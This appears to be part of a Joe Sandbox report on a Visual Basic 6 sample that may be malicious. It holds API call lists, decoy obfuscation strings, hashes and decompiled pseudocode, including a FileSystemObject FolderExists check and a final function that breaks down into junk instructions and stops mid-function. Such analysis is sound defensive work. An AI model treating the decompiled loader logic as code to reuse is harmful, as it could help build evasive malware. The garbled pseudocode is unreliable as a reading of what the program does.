0x00422ab6
0x00422ab7
0x00422abf
0x00422ac3
0x00422ac4
0x00422ac9
0x00422ad0
0x00422ada
0x00422ade
0x00422adf
0x00422ae7
0x00422ae8
0x00422aeb
0x00422aec
0x00422af1
0x00422afb
0x00422aff
0x00422b03
0x00422b07
0x00422b08
0x00422b0a
0x00422b12
0x00422b1b
0x00422b21
0x00422b26
0x00422b2b
0x00422b2e
0x00422b35
0x00422b37
0x00422b39
0x00422b3b
0x00422b40
0x00422b41
0x00422b4b
0x00422b53
0x00422b59
0x00422b63
0x00422b66
0x00422b6d
0x00422b72
0x00422b76
0x00422b77
0x00422b7f
0x00422b80
0x00422b8a
0x00422b92
0x00422b9a
0x00422b9e
0x00422b9f
0x00422ba2
0x00422ba3
0x00422ba5
0x00422bad
0x00422bb2
0x00422bb7
0x00422bbc
0x00422bbf
0x00422bc6
0x00422bcd
0x00422bd7
0x00422bdb
0x00422bdc
0x00422be4
0x00422be8
0x00422be9
0x00422bec
0x00422bed
0x00422bf2
0x00422bf3
0x00422bfd
0x00422c05
0x00422c09
0x00422c0d
0x00422c11
0x00422c12
0x00422c14
0x00422c1c
0x00422c26
0x00422c39
0x00422c41
0x00422c42
0x00422c47
0x00422c48
0x00422c50
0x00422c51
0x00422c5b
0x00422c63
0x00422c64
0x00422c67
0x00422c68
0x00422c6a
0x00422c6f
0x00422c72
0x00422c73
0x00422ca4
0x00422cac
0x00422cb4
0x00422cbc
0x00422cc4
0x00422cc9

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 004229DF
#614.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 00422A0E
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 00422A13
__vbaLenBstrB.MSVBVM60(Museer,?,?,?,?,?,?,004015F6), ref: 00422A2C
__vbaStrI4.MSVBVM60(00000000,Museer,?,?,?,?,?,?,004015F6), ref: 00422A32
__vbaStrMove.MSVBVM60(00000000,Museer,?,?,?,?,?,?,004015F6), ref: 00422A3C
#690.MSVBVM60(subideal,Eyeliners,HARNISKKLDT,NATURLIGHEDER,00000000,Museer,?,?,?,?,?,?,004015F6), ref: 00422A55
__vbaVarDup.MSVBVM60 ref: 00422A77
#528.MSVBVM60(?,?), ref: 00422A84
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 00422A8D
__vbaStrMove.MSVBVM60(?,?,?), ref: 00422A97
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 00422AA6
#541.MSVBVM60(?,19:19:19,?,?,?,?,?,?,004015F6), ref: 00422AB7
#522.MSVBVM60(?,?,?,19:19:19,?,?,?,?,?,?,004015F6), ref: 00422AC4
#573.MSVBVM60(?,00000002), ref: 00422ADF
__vbaVarTstNe.MSVBVM60(?,?,?,00000002), ref: 00422AEC
__vbaFreeVarList.MSVBVM60(00000004,?,00000002,?,?,?,?,?,00000002), ref: 00422B0A
__vbaLenBstrB.MSVBVM60(hyporhined,?,?,?,?,004015F6), ref: 00422B26
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422B41
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422B4B
#513.MSVBVM60(?,00000008,00000033,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422B77
__vbaStrVarMove.MSVBVM60(?,?,00000008,00000033,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422B80
__vbaStrMove.MSVBVM60(?,?,00000008,00000033,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422B8A
__vbaFreeStr.MSVBVM60(?,?,00000008,00000033,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422B92
__vbaFreeVarList.MSVBVM60(00000003,00000003,00000008,?,?,?,00000008,00000033,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00422BA5
__vbaStrCat.MSVBVM60(SKJALDEDIGTNINGERNE,Stimulationerne5), ref: 00422BB7
#573.MSVBVM60(?,00000002), ref: 00422BDC
__vbaVarCat.MSVBVM60(?,?,00000008,?,00000002), ref: 00422BED
__vbaStrVarMove.MSVBVM60(00000000,?,?,00000008,?,00000002), ref: 00422BF3
__vbaStrMove.MSVBVM60(00000000,?,?,00000008,?,00000002), ref: 00422BFD
__vbaFreeVarList.MSVBVM60(00000004,00000002,00000008,?,?,00000000,?,?,00000008,?,00000002), ref: 00422C14
__vbaVarDup.MSVBVM60 ref: 00422C39
#607.MSVBVM60(?,0000006B,00000002), ref: 00422C48
__vbaStrVarMove.MSVBVM60(?,?,0000006B,00000002), ref: 00422C51
__vbaStrMove.MSVBVM60(?,?,0000006B,00000002), ref: 00422C5B
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,0000006B,00000002), ref: 00422C6A
__vbaFreeStr.MSVBVM60(00422CCA,?,?,?,?,004015F6), ref: 00422CA4
__vbaFreeStr.MSVBVM60(00422CCA,?,?,?,?,004015F6), ref: 00422CAC
__vbaFreeStr.MSVBVM60(00422CCA,?,?,?,?,004015F6), ref: 00422CB4
__vbaFreeStr.MSVBVM60(00422CCA,?,?,?,?,004015F6), ref: 00422CBC
__vbaFreeStr.MSVBVM60(00422CCA,?,?,?,?,004015F6), ref: 00422CC4

Strings

hyporhined, xrefs: 00422B21
SKJALDEDIGTNINGERNE, xrefs: 00422BB2
NATURLIGHEDER, xrefs: 00422A41
Skyggesider, xrefs: 00422A5A
l, xrefs: 00422AC9
9, xrefs: 00422BC6
subideal, xrefs: 00422A50
HARNISKKLDT, xrefs: 00422A46
Stimulationerne5, xrefs: 00422BAD
Museer, xrefs: 00422A27
Eyeliners, xrefs: 00422A4B
19:19:19, xrefs: 00422AAE

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$Move$List$#573Bstr$#513#522#528#541#607#614#690#702Chkstk
String ID: 19:19:19$9$Eyeliners$HARNISKKLDT$Museer$NATURLIGHEDER$SKJALDEDIGTNINGERNE$Skyggesider$Stimulationerne5$hyporhined$l$subideal
API String ID: 837318482-2628105584
Opcode ID: 6b102e28d147843e5c9ea20b10471dc937dd369e7515491ff91c6ec136190bcf
Instruction ID: f406cf1972886f10342f5aa8d44f40fdb93111304b1f75366644b1832903649c
Opcode Fuzzy Hash: 6b102e28d147843e5c9ea20b10471dc937dd369e7515491ff91c6ec136190bcf
Instruction Fuzzy Hash: 5B819CB2D0010CAADB01EBE1D956EDEB7BCAF04704F50817BF215B71E1EB7896098B65

Uniqueness

Uniqueness Score: -1.00%

Function 00424574, Relevance: 61.5, APIs: 31, Strings: 4, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00424574(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v32;
				char _v36;
				void* _v40;
				void* _v44;
				char _v48;
				signed int _v52;
				char _v56;
				intOrPtr _v64;
				char _v72;
				char _v88;
				char _v104;
				signed int _v160;
				char _v168;
				void* _v172;
				void* _v176;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				intOrPtr _v200;
				char _v204;
				signed int _v208;
				signed int _v212;
				char _v216;
				signed int _v220;
				signed int _v224;
				char* _t114;
				char* _t119;
				short _t120;
				short _t124;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t144;
				signed int _t149;
				void* _t173;
				void* _t175;
				intOrPtr _t176;

				_t176 = _t175 - 0xc;
				 *[fs:0x0] = _t176;
				L004015F0();
				_v16 = _t176;
				_v12 = 0x401518;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015f6, _t173);
				L004018DE();
				L004018DE();
				_push(0);
				_push(L"Scripting.FileSystemObject");
				_push( &_v72); // executed
				L004016CE(); // executed
				_t114 =  &_v72;
				_push(_t114);
				L004016D4();
				_push(_t114);
				_push( &_v36);
				L004016DA();
				L00401938();
				_v64 = 0x80020004;
				_v72 = 0xa;
				_push( &_v72);
				_push( &_v88);
				L004016BC();
				_v160 = _v160 | 0xffffffff;
				_v168 = 0x8002;
				_push(0x10);
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(1);
				_push(L"FolderExists");
				_push(_v36);
				_t119 =  &_v104;
				_push(_t119); // executed
				L004016C8(); // executed
				_push(_t119);
				_t120 =  &_v168;
				_push(_t120);
				L00401716();
				_v176 = _t120;
				_push( &_v104);
				_push( &_v88);
				_push( &_v72);
				_push(3);
				L004018F6();
				_t124 = _v176;
				if(_t124 != 0) {
					_v64 = 0x60d961;
					_v72 = 3;
					_push( &_v72);
					L004016B6();
					L0040192C();
					if( *0x427544 != 0) {
						_v204 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v204 = 0x427544;
					}
					_t37 =  &_v204; // 0x427544
					_v176 =  *((intOrPtr*)( *_t37));
					_t131 =  *((intOrPtr*)( *_v176 + 0x14))(_v176,  &_v56);
					asm("fclex");
					_v180 = _t131;
					if(_v180 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v176);
						_push(_v180);
						L0040193E();
						_v208 = _t131;
					}
					_v184 = _v56;
					_t133 = _v52;
					_v200 = _t133;
					_v52 = _v52 & 0x00000000;
					L0040192C();
					_t136 =  *((intOrPtr*)( *_v184 + 0x138))(_v184, _t133, 1);
					asm("fclex");
					_v188 = _t136;
					if(_v188 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x138);
						_push(0x403c2c);
						_push(_v184);
						_push(_v188);
						L0040193E();
						_v212 = _t136;
					}
					_push( &_v52);
					_push( &_v48);
					_push(2);
					L00401914();
					L004018A2();
					L00401938();
					if( *0x427544 != 0) {
						_v216 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v216 = 0x427544;
					}
					_t74 =  &_v216; // 0x427544
					_v176 =  *((intOrPtr*)( *_t74));
					_t144 =  *((intOrPtr*)( *_v176 + 0x14))(_v176,  &_v56);
					asm("fclex");
					_v180 = _t144;
					if(_v180 >= 0) {
						_v220 = _v220 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v176);
						_push(_v180);
						L0040193E();
						_v220 = _t144;
					}
					_v184 = _v56;
					_t149 =  *((intOrPtr*)( *_v184 + 0x108))(_v184,  &_v172);
					asm("fclex");
					_v188 = _t149;
					if(_v188 >= 0) {
						_v224 = _v224 & 0x00000000;
					} else {
						_push(0x108);
						_push(0x403c2c);
						_push(_v184);
						_push(_v188);
						L0040193E();
						_v224 = _t149;
					}
					_t124 = _v172;
					_v28 = _t124;
					L004018A2();
					_push(0x63);
					L00401806();
					L0040192C();
				}
				_push(0x42492e);
				L004018E4();
				L004018A2();
				L004018E4();
				L004018E4();
				return _t124;
			}

0x00424577
0x00424586
0x00424592
0x0042459a
0x0042459d
0x004245a4
0x004245b3
0x004245bc
0x004245c7
0x004245cc
0x004245ce
0x004245d6
0x004245d7
0x004245dc
0x004245df
0x004245e0
0x004245e5
0x004245e9
0x004245ea
0x004245f2
0x004245f7
0x004245fe
0x00424608
0x0042460c
0x0042460d
0x00424612
0x00424619
0x00424623
0x00424626
0x00424630
0x00424631
0x00424632
0x00424633
0x00424634
0x00424636
0x0042463b
0x0042463e
0x00424641
0x00424642
0x0042464a
0x0042464b
0x00424651
0x00424652
0x00424657
0x00424661
0x00424665
0x00424669
0x0042466a
0x0042466c
0x00424674
0x0042467d
0x00424683
0x0042468a
0x00424694
0x00424695
0x0042469f
0x004246ab
0x004246c8
0x004246ad
0x004246ad
0x004246b2
0x004246b7
0x004246bc
0x004246bc
0x004246d2
0x004246da
0x004246f2
0x004246f5
0x004246f7
0x00424704
0x00424726
0x00424706
0x00424706
0x00424708
0x0042470d
0x00424713
0x00424719
0x0042471e
0x0042471e
0x00424730
0x00424736
0x00424739
0x0042473f
0x0042474e
0x00424762
0x00424768
0x0042476a
0x00424777
0x0042479c
0x00424779
0x00424779
0x0042477e
0x00424783
0x00424789
0x0042478f
0x00424794
0x00424794
0x004247a6
0x004247aa
0x004247ab
0x004247ad
0x004247b8
0x004247c0
0x004247cc
0x004247e9
0x004247ce
0x004247ce
0x004247d3
0x004247d8
0x004247dd
0x004247dd
0x004247f3
0x004247fb
0x00424813
0x00424816
0x00424818
0x00424825
0x00424847
0x00424827
0x00424827
0x00424829
0x0042482e
0x00424834
0x0042483a
0x0042483f
0x0042483f
0x00424851
0x0042486c
0x00424872
0x00424874
0x00424881
0x004248a6
0x00424883
0x00424883
0x00424888
0x0042488d
0x00424893
0x00424899
0x0042489e
0x0042489e
0x004248ad
0x004248b4
0x004248bb
0x004248c0
0x004248c2
0x004248cc
0x004248cc
0x004248d1
0x00424910
0x00424918
0x00424920
0x00424928
0x0042492d

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00424592
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 004245BC
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 004245C7
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 004245D7
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 004245E0
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 004245EA
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 004245F2
#647.MSVBVM60(?,0000000A), ref: 0042460D
__vbaChkstk.MSVBVM60 ref: 00424626
__vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 00424642
__vbaVarTstEq.MSVBVM60(?,00000000,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 00424652
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,00000000,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 0042466C
#574.MSVBVM60(00000003), ref: 00424695
__vbaStrMove.MSVBVM60(00000003), ref: 0042469F
__vbaNew2.MSVBVM60(00403C1C,00427544,00000003), ref: 004246B7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00424719
__vbaStrMove.MSVBVM60(00000001), ref: 0042474E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000138), ref: 0042478F
__vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 004247AD
__vbaFreeObj.MSVBVM60 ref: 004247B8
__vbaFreeVar.MSVBVM60 ref: 004247C0
__vbaNew2.MSVBVM60(00403C1C,00427544), ref: 004247D8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 0042483A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000108), ref: 00424899
__vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000108), ref: 004248BB
#537.MSVBVM60(00000063), ref: 004248C2
__vbaStrMove.MSVBVM60(00000063), ref: 004248CC
__vbaFreeStr.MSVBVM60(0042492E,?,?,?,00000000,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 00424910
__vbaFreeObj.MSVBVM60(0042492E,?,?,?,00000000,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 00424918
__vbaFreeStr.MSVBVM60(0042492E,?,?,?,00000000,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 00424920
__vbaFreeStr.MSVBVM60(0042492E,?,?,?,00000000,?,Scripting.FileSystemObject,00000000,?,?,?,?,004015F6), ref: 00424928

Strings

Scripting.FileSystemObject, xrefs: 004245CE
DuB, xrefs: 004246D2
DuB, xrefs: 004247F3
FolderExists, xrefs: 00424636

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$CheckHresult$Move$ChkstkCopyListNew2$#537#574#647#716AddrefCallLate
String ID: DuB$DuB$FolderExists$Scripting.FileSystemObject
API String ID: 3082538248-3140286269
Opcode ID: 5f0cfd4aeec4b7d0d5934284d680ee92b9cbdfcc246ba4e58fc5b3c56085a50a
Instruction ID: f561923ec1cdbbee1fcbd4580028b808f85c02ec2c740af0362f3ab9ca451cd6
Opcode Fuzzy Hash: 5f0cfd4aeec4b7d0d5934284d680ee92b9cbdfcc246ba4e58fc5b3c56085a50a
Instruction Fuzzy Hash: D6A10671E00228AFDB20EF91CD45FDEB7B9AF04304F5041AAE109B72A1DB785A85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004261E8, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E004261E8(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a63, signed int _a75, char _a1985961724) {
				char _v3;
				char _v5;
				intOrPtr _v8;
				signed int _v12;
				short _v24;
				long long _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v68;
				char _v84;
				char* _v92;
				char _v100;
				char _v104;
				void* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _t285;
				char* _t289;
				signed int _t295;
				signed int _t300;
				intOrPtr* _t302;
				intOrPtr* _t303;
				void* _t311;
				void* _t314;
				signed char _t317;
				intOrPtr* _t320;
				signed char _t322;
				signed char _t331;
				signed char _t332;
				signed int _t333;
				intOrPtr* _t334;
				intOrPtr* _t335;
				intOrPtr* _t336;
				signed char _t341;
				signed int _t342;
				signed char _t344;
				intOrPtr* _t345;
				intOrPtr* _t346;
				void* _t347;
				void* _t348;
				signed int _t354;
				void* _t355;
				signed char _t357;
				intOrPtr* _t363;
				signed char _t365;
				void* _t370;
				signed int _t371;
				char* _t376;
				signed int _t379;
				signed int _t380;
				signed int _t384;
				signed int* _t388;
				signed int* _t389;
				signed int _t390;
				signed int _t395;
				void* _t396;
				signed int _t398;
				signed int* _t400;
				void* _t419;
				void* _t422;
				void* _t424;
				void* _t429;
				char* _t445;
				signed char* _t446;
				signed int _t455;
				signed int _t461;
				signed int _t464;
				signed int _t473;
				void* _t474;
				signed char _t477;
				long long _t484;

				_t370 = __ebx;
				_t461 = _t473;
				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t473;
				_push(0x74);
				L004015F0();
				_push(__ebx);
				_v12 = _t473;
				_v8 = 0x4015e0;
				_v92 = 0x80020004;
				_v100 = 0xa;
				_t285 = 0x10;
				L004015F0();
				_t445 =  &_v100;
				_t395 = _t473;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"FORMALIAS");
				_push(L"Vince1");
				_push(L"Frugtfarvers1"); // executed
				L00401686(); // executed
				_t384 = _t285;
				L0040192C();
				_push(_t285);
				_push(L"Buzylene");
				L00401734();
				asm("sbb eax, eax");
				_v108 =  ~( ~( ~_t285));
				_t376 =  &_v48;
				L004018E4();
				_t289 = _v108;
				if(_t289 == 0) {
					L12:
					_t484 =  *0x4015d8;
					_push(_t376);
					_push(_t376);
					 *_t473 = _t484;
					L0040179A();
					_v32 = _t484;
					_v24 = 0x67e;
					asm("wait");
					_push(0x4263e8);
					L004018E4();
					return _t289;
				}
				if( *0x427544 != 0) {
					_v128 = 0x427544;
				} else {
					_push(0x427544);
					_push(0x403c1c);
					L00401878();
					_v128 = 0x427544;
				}
				_t12 =  &_v128; // 0x427544
				_v108 =  *((intOrPtr*)( *_t12));
				_t295 =  *((intOrPtr*)( *_v108 + 0x14))(_v108,  &_v52);
				asm("fclex");
				_v112 = _t295;
				if(_v112 >= 0) {
					_t23 =  &_v132;
					 *_t23 = _v132 & 0x00000000;
					__eflags =  *_t23;
				} else {
					_push(0x14);
					_push(0x403c0c);
					_push(_v108);
					_push(_v112);
					L0040193E();
					_v132 = _t295;
				}
				_v116 = _v52;
				_t300 =  *((intOrPtr*)( *_v116 + 0x118))(_v116,  &_v104);
				asm("fclex");
				_v120 = _t300;
				if(_v120 >= 0) {
					_t36 =  &_v136;
					 *_t36 = _v136 & 0x00000000;
					__eflags =  *_t36;
				} else {
					_push(0x118);
					_push(0x403c2c);
					_push(_v116);
					_push(_v120);
					L0040193E();
					_v136 = _t300;
				}
				L0040173A();
				_v36 = _t300;
				_t379 =  &_v52;
				L004018A2();
				_t302 = _v44 + 0x4e7d2;
				if(_t302 < 0) {
					L00401680();
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("sahf");
					asm("sahf");
					asm("sahf");
					asm("sahf");
					__eflags = _t302 - 0x64;
					_t303 = _t302 +  *_t302;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *((char*)(_t445 + 2)) = _t303;
					 *_t303 =  *_t303 + _t303;
					asm("adc [eax], al");
					 *_t303 =  *_t303 + _t303;
					 *_t303 =  *_t303 + _t303;
					 *_t303 =  *_t303 + _t303;
					 *_t303 =  *_t303 + _t303;
					 *_t303 =  *_t303 + _t303;
					 *_t303 =  *_t303 + _t303;
					 *_t303 =  *_t303 + _t303;
					 *_t303 =  *_t303 + _t303;
					 *_t303 =  *_t303 + _t303;
					 *_t303 =  *_t303 + _t303;
					 *((intOrPtr*)(_t445 - 0x5bfffd9a)) =  *((intOrPtr*)(_t445 - 0x5bfffd9a)) + _t384;
					asm("o16 add al, [eax]");
					 *((intOrPtr*)(_t303 - 0x7ffffdb8)) =  *((intOrPtr*)(_t303 - 0x7ffffdb8)) + _t303;
					_t446 = 0xcc000266;
					asm("o16 add al, [eax]");
					asm("fisub dword [esi+0x2]");
					asm("o16 add al, [eax]");
					__eflags = 2 + _t379 - 1 - 0x66;
					_t371 = _t370 - 1;
					 *0xcc000266 =  *0xcc000266 | 0x00000067;
					_t474 = _t473 - 1;
					asm("sbb byte [esi], 0x67");
					_t311 = 0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))))))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))))))))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))))))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)))) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66)) +  *((intOrPtr*)(0x66 +  *0x66 +  *((intOrPtr*)(0x66 +  *0x66))))))))))));
					 *(_t395 + 2) =  *(_t395 + 2) ^ 0x00000066;
					 *((intOrPtr*)(_t311 + 0x40800002)) =  *((intOrPtr*)(_t311 + 0x40800002)) + _t371;
					_push(_t474);
					_t388 = 0x800002;
					_t314 = _t311 + 0xcc000266[_t371] + 0xcc000266[_t371] +  *((intOrPtr*)(_t311 + 0xcc000266[_t371] + 0xcc000266[_t371]));
					 *_t379 =  *_t379 + 2;
					 *((intOrPtr*)(_t314 - 0x7ffffdfd)) =  *((intOrPtr*)(_t314 - 0x7ffffdfd)) + _t314;
					_push(es);
					_t317 = _t314 + 0x64800002 + 0xcc000266[_t371] +  *((intOrPtr*)(_t314 + 0x64800002 + 0xcc000266[_t371]));
					 *_t395 =  *_t395 + 2;
					_t70 = _t317 - 0x7ffffd8c;
					 *_t70 =  *(_t317 - 0x7ffffd8c) + _t317;
					__eflags =  *_t70;
					if( *_t70 < 0) {
						L18:
						_push(0x20b0002);
						 *((intOrPtr*)(_t317 + 0x2684a)) =  *((intOrPtr*)(_t317 + 0x2684a)) + _t317;
						asm("lds eax, [edx]");
						 *((intOrPtr*)(_t317 - 0x7ffffdf4)) =  *((intOrPtr*)(_t317 - 0x7ffffdf4)) + _t317;
						asm("adc byte [eax+ebp*2+0x2], 0x0");
						asm("bound ebp, [eax+0x2]");
						 *_t446 =  *_t446 + _t379;
						_t320 = (_t317 | 0x78800002) +  *(_t317 | 0x78800002) +  *((intOrPtr*)((_t317 | 0x78800002) +  *(_t317 | 0x78800002)));
						 *(_t320 + 2 + _t461 * 2) =  *(_t320 + 2 + _t461 * 2) ^ 0x00000000;
						asm("adc [edx], al");
						 *((intOrPtr*)(_t320 + 0x26888)) =  *((intOrPtr*)(_t320 + 0x26888)) + _t320;
						asm("movsb");
						_push(0x68b00002);
						_t447 = 0xd4000268;
						_t322 = _t320 +  *_t320 +  *((intOrPtr*)(_t320 +  *_t320));
						asm("lock push 0x2340002");
						 *((intOrPtr*)(_t322 + 0x268fe)) =  *((intOrPtr*)(_t322 + 0x268fe)) + _t322;
						asm("sbb ch, [ecx+0x2]");
						 *((intOrPtr*)((_t322 | 0x00000069) +  *(_t322 | 0x00000069))) =  *((intOrPtr*)((_t322 | 0x00000069) +  *(_t322 | 0x00000069))) + _t379;
						 *((intOrPtr*)(_t379 + 2 + _t461 * 2)) =  *((intOrPtr*)(_t379 + 2 + _t461 * 2)) + _t379;
						 *((intOrPtr*)(_t388 + 0x69)) =  *((intOrPtr*)(_t388 + 0x69)) + _t371;
						asm("sbb byte [esi+0x2], 0x0");
						asm("adc byte [esi-0x5bfffd97], 0x69");
						_t396 = 0x68e40002;
						_t331 =  *[fs:edx] * 0x2698000 + _t379 +  *((intOrPtr*)( *[fs:edx] * 0x2698000 + _t379)) +  *((intOrPtr*)( *[fs:edx] * 0x2698000 + _t379 +  *((intOrPtr*)( *[fs:edx] * 0x2698000 + _t379)))) +  *((intOrPtr*)( *[fs:edx] * 0x2698000 + _t379 +  *((intOrPtr*)( *[fs:edx] * 0x2698000 + _t379)) +  *((intOrPtr*)( *[fs:edx] * 0x2698000 + _t379 +  *((intOrPtr*)( *[fs:edx] * 0x2698000 + _t379))))));
						 *(_t331 + 2) =  *(_t331 + 2) & 0x00000000;
						_t332 = _t331 | 0x00000002;
						 *((intOrPtr*)(_t332 + 0x269b6)) =  *((intOrPtr*)(_t332 + 0x269b6)) + _t332;
						asm("int 0x2");
